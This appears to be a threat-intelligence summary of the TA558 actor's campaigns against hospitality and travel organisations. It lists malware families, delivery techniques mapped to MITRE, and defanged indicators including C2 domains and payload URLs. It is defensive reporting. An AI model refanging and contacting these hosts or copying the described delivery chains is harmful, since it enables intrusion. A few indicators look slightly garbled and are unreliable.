TA558 is a financially motivated threat actor targeting hospitality, hotel, and travel organizations, predominantly in Latin America, with activity in Western Europe and North America. From 2018 onward, Proofpoint observed TA558 repeatedly using reservation-themed lures and a mix of malware payloads (including Loda, Vjw0rm, Revenge RAT, AsyncRAT) while evolving delivery methods—shifting to URLs and container files in 2022 to bypass macro protections. #TA558 #RevengeRAT #Loda #Vjw0rm #AsyncRAT #njRAT #Proofpoint #Hospitality #Travel
Keypoints
- TA558 is a financially motivated actor targeting hospitality, hotel, and travel organizations, primarily in Latin America, with additional activity in Western Europe and North America.
- Since 2018, TA558 has used a variety of malware payloads (Loda, Vjw0rm, Revenge RAT, AsyncRAT, njRAT, and others) and repeats certain campaign patterns and infrastructure across years.
- In 2022, TA558 increased operational tempo and pivoted away from macro-enabled Office documents to URLs and container files (RAR/ISO) to deliver payloads, likely to evade macro-blocking by Microsoft.
- Language use is strongly skewed toward Portuguese and Spanish (over 90%), with occasional English lures and weekly language switching that shifts targeting by language.
- TA558 leverages attacker-owned infrastructure but also compromises hotel websites to host payloads and C2 traffic, using tactics like scheduled tasks for persistence and PowerShell/MSHTA in delivery chains.
- Malware payloads frequently include Loda, Vjw0rm, Revenge RAT, AsyncRAT, and njRAT, with evidence of elaborate delivery chains and helper scripts appearing in 2021.
MITRE Techniques
- [T1566.001] Phishing – Emails with malicious Word attachments exploiting Equation Editor vulnerabilities (e.g., CVE-2017-11882) to download and install malware. “Proofpoint first observed TA558 in April 2018. These early campaigns typically used malicious Word attachments that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) or remote template URLs to download and install malware.”
- [T1204.002] User Execution – Macro-enabled Office documents enabling the download and installation of malware. “In 2020, TA558 stopped using Equation Editor exploits and began distributing malicious Office documents with macros, typically VBA macros, to download and install malware.”
- [T1059.001] PowerShell – Use of PowerShell to download and execute payloads; “The PowerPoint attachment that… executed a PowerShell script to download a VBS payload from an actor-controlled domain.”
- [T1105] Ingress Tool Transfer – Downloading payloads from remote URLs; “PowerShell script to download a VBS payload from an actor-controlled domain.” (illustrates downloading external payloads).
- [T1036] Masquerading – Adversaries mimic legitimate service names to appear trustworthy; “the group mimics technology service names to appear legitimate.”
- [T1071.001] Web Protocols – Use of web-based C2 and hosted payloads; “Proofpoint observed TA558 leverage compromised hotel websites to host malware payloads, thus adding legitimacy to its malware delivery and C2 traffic.”
Indicators of Compromise
- [Domain] C2 domains – quedabesouro[.]ddns[.]net, fica? queda212[.]duckdns[.]org
- [Domain] C2 domains – 3030pp[.]hopto[.]org, 4success[.]zapto[.]org, success20[.]hopto[.]org
- [Domain] C2 domains – vemvemserver[.]duckdns[.]org, msin[.]hopto[.]org, cdtpitbull[.]hopto[.]org
- [Domain] C2 domains – 111234cdt[.]ddns[.]net, cdt2021[.]zapto[.]org
- [IP] IP – 38[.]132[.]101[.]45 (RevengRAT C2 IP)
- [SHA256] 796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910, 7dc70d023b2ee5a941edd925999bb6864343b11758c7dc18309416f2947ddb6
- [File] Filename – RESERVA.docx, 1000172347.xlsm
- [URL] Payload URL – hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc, hxxps[:]//brasilnativopousada[.]com[.]br/Final[.]txt
- [URL] Payload URL – hxxps[:]//www[.]unimed-corporated[.]com/microsoft[.]txt, hxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpg